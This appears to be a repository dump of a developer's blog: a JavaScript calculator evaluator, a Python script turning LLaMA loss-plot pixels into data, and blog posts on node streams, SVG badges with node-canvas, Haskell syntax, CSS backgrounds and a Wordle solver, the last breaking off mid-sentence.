SyntaxTreeNode.type.postfixOp:\n if (!mpf[this.func]) {\n throw new Error(`Invalid postfix operator ${this.func}`);\n }\n if (this.func === 'fac') {\n // The factorial function is nonfunctional in mp-wasm,\n // see https://github.com/cag/mp-wasm/issues/3\n result.push(mpf.gamma(childrenValues[0].add(1)));\n } else {\n result.push(mpf[this.func](childrenValues[0]));\n }\n break;\n case SyntaxTreeNode.type.func:\n operator = {\n \"ln\": \"log\",\n \"round\": \"rintRound\",\n \"floor\": \"rintFloor\",\n \"ceil\": \"rintCeil\",\n \"trunc\": \"rintTrunc\",\n }[this.func] || this.func;\n result.push(mpf[this.func](...childrenValues));\n break;\n default:\n throw new Error(\"Invalid evaluation \" +\n \"of nonexistent node type \" + this.type);\n }\n childrenEval.forEach(c => errors.push(...c.errors));\n return { result, errors };\n }\n\n toString() {\n const info =\n (this.type === SyntaxTreeNode.type.number)? this.number + ' ':\n (this.type === SyntaxTreeNode.type.prefixOp ||\n this.type === SyntaxTreeNode.type.infixOp ||\n this.type === SyntaxTreeNode.type.postfixOp ||\n this.type === SyntaxTreeNode.type.func)? this.func + ' ':\n '';\n const curText =\n `${this.startLine}:${this.startColumn}-` +\n `${this.endLine}:${this.endColumn} ` +\n `${SyntaxTreeNode.nameFromType[this.type]} ` +\n `${info}${JSON.stringify(this.text)}`;\n const childrenText = this.children.map(c =>\n c.toString().split('\\n')\n .map(line => ` ${line}`)\n .join('\\n'))\n .join('\\n');\n return curText + ((this.children.length > 0)? 
`\\n${childrenText}`: \"\");\n }\n}\n\nclass SyntaxTreeError {\n constructor(message, line, column) {\n this.message = message;\n this.line = line;\n this.column = column;\n }\n toString() {\n return `${this.line}:${this.column}: ${this.message}`;\n }\n}\n\n// Node types.\nSyntaxTreeNode.type = {\n root: 0,\n expr: 1,\n number: 2,\n paren: 3,\n sep: 4,\n prefixOp: 5,\n infixOp: 6,\n postfixOp: 7,\n func: 8,\n};\nSyntaxTreeNode.nameFromType = Object.keys(SyntaxTreeNode.type);\n\nSyntaxTreeNode.token = {\n root: new RegExp(\"[]\"),\n expr: new RegExp(\"[]\"),\n number: /^[0-9_]+(\\.[0-9_]+)?([eE][0-9_]+)?/,\n paren: /^\\(/,\n sep: /^,/,\n prefixOp: /^[+-]/,\n infixOp: /^([+\\-*×/÷%^]|\\*\\*)/, // If you add an operator, add its precedence in operatorAssociativity.\n postfixOp: /^[!]/,\n func: /^(rootn|dim|atan2|gammaInc|beta|jn|yn|agm|hypot|fmod|remainder|min|max|sqr|sqrt|recSqrt|cbrt|neg|abs|log|ln|log2|log10|log1p|exp|exp2|exp10|expm1|cos|sin|tan|sec|csc|cot|acos|asin|atan|cosh|sinh|tanh|sech|csch|coth|acosh|asinh|atanh|eint|li2|gamma|lngamma|digamma|zeta|erf|erfc|j0|j1|y0|y1|rint|ceil|rintCeil|floor|rintFloor|round|rintRound|rintRoundeven|trunc|rintTrunc|frac)\\b/,\n};\n\nSyntaxTreeNode.operators = [...\"+-*×/÷%^\", \"**\", \"!\"];\nSyntaxTreeNode.operatorAssociativity =\n SyntaxTreeNode.operators.reduce((a, o, i) => a.set(o, i), new Map());\nSyntaxTreeNode.funcFromOperator = {\n '+': \"add\",\n '-': \"sub\",\n '*': \"mul\",\n '×': \"mul\",\n '/': \"div\",\n '÷': \"div\",\n '%': \"remainder\",\n '^': \"pow\",\n '**': \"pow\",\n '!': \"fac\",\n};\n\nclass Evaluator {\n eval(tree) {\n return tree.root.eval();\n }\n}\n\nexport default Calculator;\n"
},
{
"alpha_fraction": 0.5368473529815674,
"alphanum_fraction": 0.587809145450592,
"avg_line_length": 39.43434524536133,
"blob_id": "1db0e162864a354932ffa4dce588f3a38b58ed6e",
"content_id": "401ef47aae610231403c6edbfd599c1a06697035",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4003,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 99,
"path": "/blog/assets/chinchilla-s-death/llama-data.py",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "import csv\n\nllama = {}\nversions = ['1', '2']\nllama_models = {\n '1': ['7B', '13B', '33B', '65B'],\n '2': ['7B', '13B', '34B', '70B']\n}\nllama_gpu_hours = {\n '1': {\n '7B': 82432,\n '13B': 135168,\n '33B': 530432,\n '65B': 1022362,\n },\n '2': {\n '7B': 184320,\n '13B': 368640,\n '34B': 1038336,\n '70B': 1720320,\n }\n}\n\nfor version in versions:\n llama[version] = {}\n for model in llama_models[version]:\n llama[version][model] = {}\n # Extracted with `mutool show llama.pdf 108`.\n with open(f\"./data/llama{version}-{model}-pixels.tsv\", 'r') as f:\n reader = csv.reader(f, delimiter='\\t')\n pixels = []\n for row in reader:\n pixels.append([float(row[0]), float(row[1])])\n llama[version][model]['pixels'] = pixels\n llama[version][model]['gpu_hours'] = llama_gpu_hours[version][model]\n\n# Pixel conversion.\nfor version in versions:\n for model in llama_models[version]:\n llama[version][model]['x_pixels'] = [pixel[0] for pixel in llama[version][model]['pixels']]\n llama[version][model]['y_pixels'] = [pixel[1] for pixel in llama[version][model]['pixels']]\n\n# Value = A * pixel + B\n# => A = (last_value - first_value) / (last_pixel - first_pixel)\n# B = last_value - A * last_pixel\ndef linear_coeffs(series, first_value, last_value):\n a = (last_value - first_value) / (series[-1] - series[0])\n b = last_value - a * series[-1]\n return [a, b]\n\n# We use https://apps.automeris.io/wpd/ to estimate the first and last points of the 65B model.\n# Since the first data dot does not appear on the graph, we adjust the Y value\n# to have the end of the 7B training run match.\nllama_plot_coeffs = {\n '1': {\n 'x': linear_coeffs(llama['1']['65B']['x_pixels'], 100, 2000),\n 'y': linear_coeffs(llama['1']['65B']['y_pixels'], 2.25, 1.5572327044025158),\n },\n '2': {\n 'x': linear_coeffs(llama['2']['70B']['x_pixels'], 14.77104874446087, 2000.0),\n 'y': linear_coeffs(llama['2']['70B']['y_pixels'], 2.39, 1.4957264957264955),\n }\n}\n\n# Conversion functions.\ndef llama_gtoken_from_x_pixel(pixel, version):\n return pixel * llama_plot_coeffs[version]['x'][0] + llama_plot_coeffs[version]['x'][1]\n\ndef llama_loss_from_y_pixel(pixel, version):\n return pixel * llama_plot_coeffs[version]['y'][0] + llama_plot_coeffs[version]['y'][1]\n\nfor version in versions:\n for model in llama_models[version]:\n llama[version][model]['gtokens'] = [llama_gtoken_from_x_pixel(x, version) for x in llama[version][model]['x_pixels']]\n llama[version][model]['loss'] = [llama_loss_from_y_pixel(x, version) for x in llama[version][model]['y_pixels']]\nprint(\"First point:\", llama['1']['7B']['gtokens'][0], \"gigatokens with loss\", llama['1']['7B']['loss'][0])\n\n# Time conversion.\ndef gpu_hour_per_gtoken(version, model):\n return llama[version][model]['gpu_hours'] / llama[version][model]['gtokens'][-1]\n\nfor version in versions:\n for model in llama_models[version]:\n hpgt = gpu_hour_per_gtoken(version, model)\n print(f\"Version {version} model {model} cruises at {1e9/hpgt/3600} tokens/second\")\n llama[version][model]['gpu_hour_per_gtoken'] = hpgt\n llama[version][model]['hours'] = [gtokens * hpgt for gtokens in llama[version][model]['gtokens']]\nprint(\"First point:\", llama['1']['7B']['hours'][0], \"hours for\", llama['1']['7B']['gtokens'][0], \"gtokens (\", llama['1']['7B']['gpu_hour_per_gtoken'], \"hour/gtoken )\")\n\n# Write result.\nfor version in versions:\n for model in llama_models[version]:\n with open(f\"./data/llama{version}-{model}.tsv\", \"w\") as f:\n writer = csv.writer(f, delimiter=\"\\t\")\n 
writer.writerow([\"Hours\", \"Loss\"])\n data = [[llama[version][model]['hours'][i],\n llama[version][model]['loss'][i]]\n for i in range(len(llama[version][model]['hours']))]\n writer.writerows(data)\n"
},
{
"alpha_fraction": 0.6780899167060852,
"alphanum_fraction": 0.6865168809890747,
"avg_line_length": 33.230770111083984,
"blob_id": "c2a3a600f8fb821314e9c355852f5ab3c47ca2ee",
"content_id": "9ca4a6db17826145836ce13ef263ad42e5769f1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1780,
"license_type": "no_license",
"max_line_length": 183,
"num_lines": 52,
"path": "/blog/src/fs-createreadstream-should-be-re-engineered.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# `fs.createReadStream` Should Be Re-engineered\n\nI just had a strange WTF moment with node.\n\nTo avoid the state of dismay I went in, just remember this:\n\nIn node, streams have a `on('error', function(err) {})` method which they run when some errors happen.\nUsually, node's default APIs hook a callback to the error, and give you information about this error in the continuation, like so:\n\n fs.readFile(file, function(err, data) { /* you have access to err here */ });\n\nUnfortunately, `fs.createReadStream` doesn't work like that.\nSince there is no listener for the 'error' event on the stream, node crashes loudly, and you cannot try/catch that, because it doesn't happen in the same event loop cycle as the call.\n\n try {\n var stream = fs.createReadStream('./bogus-file');\n } catch (e) {\n // Not caught!\n }\n\nMy advice: if a stream doesn't give you error information, listen to its 'error's.\n\n stream.on('error', function(err) { ... });\n\n----\n\nI caught the issue as I read the source code of `stream.js`.\n\n // don't leave dangling pipes when there are errors.\n function onerror(er) {\n cleanup();\n if (this.listeners('error').length === 0) {\n throw er; // Unhandled stream error in pipe.\n }\n }\n\nIf nothing listens to the 'error' event, it crashes. Obviously, this kind of construct fails to work with try/catch.\n\nAs a result, I wish *all* node API calls used the usual node error handling.\n\n fs.createReadStream(file, function (err) { ... }, options);\n\nWhy wasn't it designed this way originally?\n\nAPIs are hard. At least they're not copyrightable now.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2012-06-04T14:48:00Z\",\n \"keywords\": \"js\" }\n</script>\n"
},
{
"alpha_fraction": 0.7564727663993835,
"alphanum_fraction": 0.765228271484375,
"avg_line_length": 91.96511840820312,
"blob_id": "1e4ae438179d643b6b8ea4d60b5ddeef1582bb27",
"content_id": "6ada41fc39589635b643c57fc673864d3f8dfe51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 8009,
"license_type": "no_license",
"max_line_length": 601,
"num_lines": 86,
"path": "/blog/src/canvas-svg.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Canvas SVG\n\nThe other night, I was dreaming of colorful lines.\n\nI was racing on this roller-coaster of red, green, blue pathways, occasionally jumping from one platform to the next. It felt like being part of this [acko.net](http://acko.net/) front page. I hurt myself quite a bit and, slowly and surely, ended up coloring everything in red. That's until I fell down into this bright light surrounding me, only to realize that space was circular; falling from the bottom made me land on the top. The sound of my knees breaking made me wake up.\n\n## That is when I realized that an effort I had ongoing had a simple and elegant solution.\n\nYou may know that I made and maintain the <http://shields.io> service. An effort in providing badges for use in GitHub and elsewhere, this website promotes the use of SVG as a means to diminish bandwidth costs for images and solve the zoom / retina / [4x](http://fremycompany.com/BG/2013/Why-Super-Retina-screens-are-worthwhile-172/) / `<picture>` problem that so many web developers are losing hair on. You see, images are either photos, textures, or icons / banners / logos / badges / all this ilk.\n\n- For photos: use JPEG / WebP with `<picture>` and store a 4x version of it.\n- For textures: WebGL is your friend.\n- For the rest: use SVG.\n\nThe neat outcome of this categorization is that, as we go towards an animated world where even newspaper pictures are [ambiance loops](http://www.nytimes.com/newsgraphics/2013/10/27/south-china-sea/) straight from a Harry Potter book, or [astonishing video interviews](http://www.theguardian.com/world/interactive/2013/nov/01/snowden-nsa-files-surveillance-revelations-decoded) that deliver immediate context to the article… with seamless looping scenes algorithms [already there](http://research.microsoft.com/en-us/um/people/hoppe/proj/videoloops/)… the progressive solutions are thankfully obvious.\n\n- WebP becomes WebM. (*Please, web devs, take a page from [moot's book](http://blog.4chan.org/post/81896300203/webm-support-on-4chan) and no less than the great Vine service, don't use wasteful gifs or looping WebP!*)\n- WebGL is already built for interactivity.\n- SVG has animations, but, more importantly, it shares the same DOM that we can JSify.\n\n## But I digress.\n\nThe issue that has itched me as I provided those badges was fonts. I could not freely choose them. Either bundling a font in the image would make it weigh *way too much*, or subsetting the font dynamically would take *way too much time*. The only thing I had was to hide behind **web-safe fonts**, and compute the probability that the badge would have just the right width, and the text would look just about right for users to have no idea.\n\nI am serious, by the way, about computing the probabilities. Look at [this issue on GitHub](https://github.com/badges/gh-badges/issues/14). Scroll. Keep scrolling.\n\nHow can we get away from this? In general, how can we use many different fonts on many different images?\n\nYou may not have noticed this by looking at the <http://shields.io> website: [the logo](http://shields.io/logo.svg) is made of [OpenSans](http://en.wikipedia.org/wiki/Open_Sans) text. Whenever we can precompute a subsetted font, we should, and that is what I did: a font that contains only the letters S, h, i, e, l, d, s, I and O. No duplicate letters; this is a worst-case. The logo weighs 8.6KB, and it's all SVG.\n\nHow do you do it? 
Use SIL's [ttfsubset](http://scripts.sil.org/cms/scripts/page.php?site_id=nrsi&id=fontutils#fb138857) (it is brilliantly useful, despite its flawed installation process—I actually had a bit of a struggle to make it work [back in January](http://scripts.sil.org/svn-public/utilities/Font-TTF-scripts/trunk/Changes) but I fixed it).\n\n $ cat glyphs-logo\n S h i e l d s I O\n $ ttfsubset -n OpenSans -g glyphs-logo OpenSans.woff OpenSans-icon-subset.woff\n $ node -p 'var fs = require(\"fs\"); fs.writeFileSync(\"OpenSans-icon-subset.woff.base64\", fs.readFileSync(\"OpenSans-icon-subset.woff\", \"base64\"));'\n\nNonetheless, as I said before, I cannot use this trick for all my badges, since the computation would be too expensive.\n\n## The Age Of Batik\n\nAnother option was to target a specific font, convert it to SVG paths stored in one obese JSON, and compute the position of each letter with respect to each other. Every letter would then be a distinct SVG path, and our obese JSON would contain kerning information so that we can avoid designers having their eyes bleed.\n\nThere already exists a converter from TTF to SVG fonts called [Batik](http://xmlgraphics.apache.org/batik/tools/font-converter.html). We then could [parse](https://github.com/Leonidas-from-XIV/node-xml2js) the XML, extract all the path description attributes, compile them into JSON.\n\nHowever, SVG fonts are a bit weird. The paths are upside-down, so that I'd have to parse each path, recompute all the dots by mirroring them along an axis I would have to find, and scale them to our intended font size.\n\nThen, for every letter I type in, I would have to keep track of the horizontal position, look for the path description, subtract the kerning information, add a `<path>` element to the badge, move my horizontal ruler, and get ready for the next letter.\n\nThis process was sufficiently complicated that I got stuck between the mirroring computation and the storage of kerning information. It was taking more time than I wanted, as well.\n\n## The Dawn Of Node-Canvas\n\nDawn? How poetic. Yet, it is true that I found a simpler solution while rising from a colorful dream along with a colorful sun, getting ready to go work on making it easier to [sell train tickets](https://www.capitainetrain.com/).\n\nI was already using [**node-canvas**](https://github.com/Automattic/node-canvas). This server-side implementation of HTML's [Canvas API](http://www.whatwg.org/specs/web-apps/current-work/multipage/the-canvas-element.html#canvasrenderingcontext2d) helps me compute the width of a badge's text in a particular font, so that each badge is produced with the correct width.\n\nI had in the past dabbled with [Cairo](http://cairographics.org/), the amazingly modular graphics engine used in Linux' Gnome environment, Mozilla's Firefox browser, WebKit's GTK+ port, Inkscape and Gnuplot. I won't admit that I first played with Cairo through [Why the Lucky Stiff's Shoes library](http://shoesrb.com/).\n\nCairo is also what powers node-canvas.\n\nCairo is splendid because it has a clear separation between **what** you want to draw and **where** you want to draw it. 
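\n\nTo make that concrete, here is a rough sketch using Cairo’s Python bindings, pycairo (not the node-canvas API; the same Cairo idea applies):\n\n    import cairo\n\n    # The one line that decides the destination: a PNG-backed image surface…\n    surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, 120, 120)\n    # …or a PDF file instead:\n    # surface = cairo.PDFSurface(\"out.pdf\", 120, 120)\n\n    # The drawing code is identical either way.\n    context = cairo.Context(surface)\n    context.set_source_rgb(0.2, 0.4, 0.9)\n    context.rectangle(10, 10, 100, 100)\n    context.fill()\n    surface.write_to_png(\"out.png\")  # (PDF and SVG surfaces end with surface.finish())\n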
You only need to flip one code line to have something you draw be on the screen, on a PNG image, on a PDF…\n\n… or on an SVG image.\n\nAll I needed was to [add the bindings](https://github.com/Automattic/node-canvas/pull/465) for it in node-canvas!\n\nSuddenly, thanks to this patch, I can:\n\n- Get SVG paths from text of a specific font (instead of resorting to web-safe fonts),\n- Generate customized SVG images server-side, which saves more bandwidth the larger the image and doesn't have that zooming / retina / 2x / `<picture>` issue,\n- Compute SVG images to be inserted in the middle of an HTML page, which makes it part of the DOM and can be animated by a nearby script.\nThink of subtle animated random background images or pre-generated real-time graphs!\n\nIt isn't merged yet, but I am already excited!\n\n## Afterword\n\nThis was going to be part of a talk I wanted to make at JSConf. Unfortunately, I was not selected as a speaker. There are many more things I wanted to cover — the history of those GitHub badges you see everywhere, the technology used to make each badge, to support both SVG, PNG and the like with exactly the same rendering, some nitty-gritty about caching and the story of our interaction with all those services we support… Maybe another blog post, another time?\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2014-08-30T13:35:00Z\",\n \"keywords\": \"svg, canvas\" }\n</script>\n"
},
{
"alpha_fraction": 0.7352876663208008,
"alphanum_fraction": 0.7383504509925842,
"avg_line_length": 73.9344253540039,
"blob_id": "a5deb05be7acadcef79b68cfb6386e3c47d36814",
"content_id": "97851d712868fdd44247ef69109e8154914d3c01",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4581,
"license_type": "no_license",
"max_line_length": 567,
"num_lines": 61,
"path": "/blog/src/rant-about-haskell.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Rant About Haskell\n\nI will fall in the typical hole of \"programmers that played with a language and believe they know why that language is bad\".\n\nHowever, I actually think a lot of things about Haskell are outstanding, starting with its well-designed type system, going on with its healthy library and ending with its excellent set of tools.\n\nWhat makes Haskell bad in my opinion is threefold:\n\n- The syntax is awkward,\n- Tracking state is made difficult,\n- The bricks of the language (ie, the type system) make it hard to build designs that are easy to grasp.\n\nNumber three relates to how its grandiose type system makes you end up with many types that use parametric polymorphism, and you must go through the hassle of understanding how each parameter is used in each function call and in each function definition. Add typeclasses to that, and understanding all this becomes even harder.\n\nNumber two, tracking state, actually stems from Number three. State is designed to work through monads, which are a complex structure that relies on both typeclasses and parametric polymorphism, which means understanding how a specific state type works is made hard.\n\nI don't want to delve too deep into why understanding those things is hard when you read code that was not authored by you, because that requires explaining some example code, which would be difficult precisely for the reason I give, and it would be really frustrating for you reader.\n\nNow, I'll tackle syntax, which is far nicer to poke fun at. The original reason people fear language with significant whitespace is that it is really easy, as a language designer, to get wrong. Python certainly did get it right, but Haskell failed. Let me show you an example of Haskell code that made me struggle to get right:\n\n expandRow :: Row Choice -> [Row Choice]\n expandRow r = expandRowAcc r []\n where expandRowAcc (x:xs) lead = if (multipleChoice x)\n then -- The pivot is x.\n [lead ++ [[d]] ++ xs | d [Row Choice]\n expandRow r = expandRowAcc r [] where\n expandRowAcc (x:xs) lead = if (multipleChoice x)\n then -- The pivot is x.\n [lead ++ [[d]] ++ xs | d <- x]\n else -- The pivot is in xs.\n expandRowAcc xs (lead ++ [x])\n\nThat is obviously invalid Haskell, right? The where keyword should be at the end of the previous line, like so:\n\n expandRow :: Row Choice -> [Row Choice]\n expandRow r = expandRowAcc r [] where\n expandRowAcc (x:xs) lead = if (multipleChoice x)\n then -- The pivot is x.\n [lead ++ [[d]] ++ xs | d <- x]\n else -- The pivot is in xs.\n expandRowAcc xs (lead ++ [x])\n\nOn the other hand, this is obviously valid Haskell, even though the where is at the start of a line:\n\n expandRow r = expandRowAcc r []\n where expandRowAcc (x:xs) lead = if (multipleChoice x) then [lead ++ [[d]] ++ xs | d <- x] else expandRowAcc xs (lead ++ [x])\n\nThere are many other things that make the syntax awkward, inconsistency such as defining a function normally (optionally with a `case…of`), with a series of clauses, and with guards (each have fundamentally distinct syntax, making the use of two of them impossible in lambda expressions). Some things are made very hard, such as knowing the precedence and therefore when to put a parenthesis. (I end up putting parentheses everywhere, because every time I see an obscure type error, I don’t want to fight with the angst that it might be caused by a precedence error.)\n\nAnother example of awkward syntax appears in one of Haskell’s most adorable features, currying. 
Currying makes the order of the parameters of the function you make matter a lot. You should make it so that the last argument, when removed, leaves a curried function that is still useful. However, using infix notation, the first argument can also be removed for currying. You’re out of luck for all other arguments.\n\nOverall, all of Haskell’s pros make code really easy to write, but its cons make code quite hard to read and maintain. Touching something already authored requires a lot of thought into how every piece fits together, and it can still break things in a way that is both predictable and logical, assuming you know Haskell better than your own mother tongue.\n\nI see Haskell as an amazing project to steer interest in language design, but I am a bigger fan of its offspring than I am of Haskell itself.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2014-07-17T14:09:00Z\",\n \"keywords\": \"haskell\" }\n</script>\n"
},
{
"alpha_fraction": 0.7141956090927124,
"alphanum_fraction": 0.7205047607421875,
"avg_line_length": 53.655174255371094,
"blob_id": "6ec139be19f169cb23836a995602d7de79266af9",
"content_id": "6e3708127fb26777b27e3230e487acf19543fbfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4757,
"license_type": "no_license",
"max_line_length": 447,
"num_lines": 87,
"path": "/blog/src/css-variables-vs-multiple-background-images.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# CSS Variables vs. Multiple Background Images\n\nI was working on [Tree](https://github.com/garden/tree) today. While in the process of adding file selection, I realized I was duplicating a lot of code for no good reason but the limitations of CSS3.\n\nTree is a collaborative file system. As such, it needs a file explorer. So far, that file explorer, dubbed Gateway, lacks the UI to delete files. Since there are many operations that work on one or more files, I needed to create a system to select multiple files. As it stands, files currently have a number of backgrounds: one image to indicate what type of file it is, and a background color to show which file is currently focused.\n\nSo far, that hasn't caused any issue, since for some reason, setting the background color and a background image isn't considered a multiple background. However, adding another background image to indicate that the file is selected, and another to hint, while hovering over a file, that you can click it to select it, forces it to go into multiple-background mode, and that distinction is no longer valid. As a result, I now have four backgrounds.\n\nOne part of the issue is that those backgrounds are either present or absent on any particular file. The other part is that when you change a multiple background, you have to include all the different backgrounds at the same time, so that the CSS engine can figure out the depth order between them from the order they have in the comma notation.\n\n(For the sake of readability, I am only writing `bgfile` instead of a long background image declaration.)\n\n #filelist li.file {\n background: bgfile;\n }\n #filelist li.file.focus {\n background: bgfile, bgfocus;\n }\n #filelist li.file.selected.focus {\n background: bgfile, bgselected, bgfocus;\n }\n #filelist li.file.selected {\n background: bgfile, bgselected;\n }\n \n /* And all over again for folders… */\n #filelist li.folder {\n background: bgfolder;\n }\n /* etc. */\n\nIt should be clear by now that, given `n` different backgrounds, we have to write `2^n` different rules, and copy the very same background image `n` times, causing a huge duplication of code! Not to mention related properties such as `background-position`, `background-size`, `background-repeat`, `background-origin` and `background-attachment`!\n\nA (hopefully) upcoming CSS standard that would solve half of the problem is [CSS variables](http://dev.w3.org/csswg/css-variables/). Thanks to that, there would be no duplication of code, and we would only have to write the background rule once for every background, instead of `n`.\n\n #filelist {\n var-bgfile: bgfile;\n var-bgfolder: bgfolder;\n var-bgfocus: bgfocus;\n var-bgselected: bgselected;\n }\n \n #filelist li.file {\n background: var(bgfile);\n }\n #filelist li.file.focus {\n background: var(bgfile), var(bgfocus);\n }\n #filelist li.file.selected.focus {\n background: var(bgfile), var(bgselected), var(bgfocus);\n }\n #filelist li.file.selected {\n background: var(bgfile), var(bgselected);\n }\n /* etc. */\n\nHowever, the example above has only `2^3 = 8` rules, but in order to add a visual hint upon hover that you can select a file, I should actually write `2^4 = 16` rules! And that exponentially increasing number of rules isn't solved by using CSS variables.\n\nFundamentally, the issue with it is that you cannot make partial background declarations. What would we need to make it happen? 
Introduce a z-index to backgrounds.\n\n    partial-background: <bg-z-index> , <bg-image> || <position> [ / <bg-size> ]? || <repeat-style> || <attachment> || <box>{1,2}\n\nAnd then I would have:\n\n    #filelist li.file {\n      partial-background: 3, bgfile;\n    }\n    #filelist li.folder {\n      partial-background: 3, bgfolder;\n    }\n    #filelist li.selected {\n      partial-background: 2, bgselected;\n    }\n    #filelist li.focus {\n      partial-background: 1, bgfocus;\n    }\n\nPartial backgrounds only mix together: a normal background image declaration clears all partial backgrounds currently on, and plays by its own rules. However, partial backgrounds should work with \`background-color\`.\n\nI don't have a strong opinion of what should happen when two z-index collide. One declaration could overwrite the other, or the behaviour could be undefined. In my case, we can't really have a file be a folder or vice-versa, and in general, having collisions should only happen by mistake.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2013-11-25T20:33:00Z\",\n \"keywords\": \"css\" }\n</script>\n"
},
{
"alpha_fraction": 0.7422152757644653,
"alphanum_fraction": 0.7658306956291199,
"avg_line_length": 38.70954513549805,
"blob_id": "f781fface0f5ebb036afdee5516e37b7a5ad36cd",
"content_id": "131ad190eea9d764ba513815adaf7afd28bc6360",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 9592,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 241,
"path": "/blog/src/sometimes-rewriting-in-another-language-works.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Sometimes, rewriting in another language works\n\n<style>\n.wordleSolver {\n width: 90%;\n margin: auto;\n padding: .6em 2em;\n border: 1px solid lightgray;\n border-radius: 50px;\n background-color: #fafaff;\n}\n.wordleSolver p {\n text-align: center;\n}\n.wordleSolver input {\n width: 7ex;\n}\noutput { word-break: break-all; }\n</style>\n<div class=wordleSolver>\n <section id=\"logParagraph\"></section>\n <form action=\"javascript:void 0\">\n <p><label> Guess: <input id=\"guessInput\" placeholder=\"salet\" autocomplete=\"off\"></label>\n <label> Constraint: <input id=\"constraintInput\" placeholder=\"ox...\" autocomplete=\"off\"></label>\n </p>\n <p>\n <button id=\"guessButton\">Guess</button>\n <button id=\"restartButton\">Restart</button>\n <span id=\"computingParagraph\">Computing…</span>\n <p>\n </form>\n <p> The constraint should be 5 characters:<br>\n o = letter at right spot, x = wrong spot, . = not in the word.</p>\n <script src=\"../assets/sometimes-rewriting-in-another-language-works/main.js\"></script>\n</div>\n\nThis month, the game of [Wordle][] has exploded in popularity.\n\n\n\nThe principle is simple: every day, a secret 5-letter word must be guessed\nby everyone on the planet from the comfort of their confinement.\nWe each have 6 guesses: every time we make one,\nthe website lists all **correctly positioned letters**,\nall **incorrectly positioned ones**,\nand the letters that are **not in the solution**.\n\n## Strategy\n\nPlaying the game, there are many strategies you quickly pick up.\n\n1. English letter frequencies help choose guesses that divide the search space faster.\n2. You can make guesses that don’t follow previously reveiled constraints:\n a completely different guess can narrow down the possibilities much more.\n3. Using common vowels on the first guess and common consonants on the second,\n helps narrow down possibilities very fast.\n\nMany [bloggers][blog1] have [tried][blog2] their [hand][blog3] at\n[optimal][blog4] strategies.\nAt the time, While skimming through them, it felt like each approach had issues.\nThat motivated me to add to the pile of suboptimal techniques with my own,\nhopefully less flawed, algorithm.\n\n## Principles\n\nI like to start tackling optimality problems by *betting on brute force*.\nIt sometimes works right off the bat,\nand when it does not, I learn a lot from it on what to improve.\n\nMany players focus on letter frequency, but while it can feel like brute force,\nit does not brute-force the right solution.\nIndeed, the guess with the most likely letters does not segment the search\nspace fairly. A lot of words have the most likely letters, after all.\n\nOne (admittedly suboptimal, but superior) target,\nis to take the list of possible solutions, and find the guess which, on average,\nreduces the search space the most, by eliminating the most candidate words.\n\nThis is where we get our hands dirty with the nitty-gritty details.\n\nThere are two different lists in the JS code of the game’s webpage.\n\n1. One contains the **2315** potential solutions,\n2. and the other contains **10657** other words that will never be solutions,\n but that can still be used as guesses. 
Red herrings, if you will.\n\nYou may think the red herrings are useless, but in fact,\nthey can achieve a greater elimination rate.\n\nSo, the algorithm needs to loop over all guesses.\n\nFor each one, it must compute the number of eliminated solutions,\nfor each possible solution.\n\nTo do that, it must loop over all possible solutions,\ncompute the constraint information that Wordle would produce for that guess,\nand then loop over all possible solutions again\nto count how many those would reject.\n\nThere are five letters in each guess, producing five constraints to check,\nand some constraints require looping over all letters of the solution.\n\nOverall, the number of operations is (10657+2315) × 2315 × 2315 × 5 × 5.\nThat is 1,737,996,667,500 steps.\n\nThat number is in that weird range of brute-force expectations:\n*it is not unreachable, but it is not trivial either*.\nConverting to nanoseconds, it is about half an hour;\nbut we can just feel our gut yelling\nthat each operation will take a bit more than a nanosecond.\n\n## Optimism is healthy, right?\n\nOff I went, candidly [implementing the algorithm][jlimpl] in [Julia][Julia].\n\n(I like Julia for its type system and extensive standard library,\nwhich makes it my go-to desk calculator.\nIt also [cares about performance][jlperf],\nrelying on an LLVM-based JIT compiler.)\n\nSince I knew I was in for a long compute time,\nI added a fancy duration estimator based on the average time the top loop took.\n\nSadly, this is what I saw:\n\n $ julia play-optimally.jl\n Ranking guesses... 1/12972 words (24950 min left)\n\nHang on, that is not half an hour… It is closer to 17 days!\n\nAt that point, I really had three options:\n\n1. Optimizing,\n2. Parallelizing,\n3. Rewriting in a faster language.\n\n## Pessimism is healthy, too\n\nI felt I could rewrite it in Rust within two hours.\nMy mental model of how the compiled assembly should be,\nmade me believe that Julia’s compiler was doing something wrong,\nand that Rust would indeed be much faster.\n\nHowever, I had no certainty, and a common maxim states that rewriting is usually\nless fruitful than redesigning with better algorithms.\n\nParallelizing was another option, but I did not jump with joy at the idea of\nbringing my laptop to its knees by squeezing each of my 8 threads for…\nlet me calculate… upwards of 50 continuous hours, at best?!\n\nSo I made a compromise:\n*I would spend 2 hours trying to fight the Julia compiler and figure out how to\nget it going fast*.\n\nBut the volume of possible compiler bailouts is large,\nand the sweet spot of JIT performance is a needle in a haystack.\n\nReader, you know where the story is going:\nthose two hours were fruitless,\nand the next two successfully [rewrote it all in 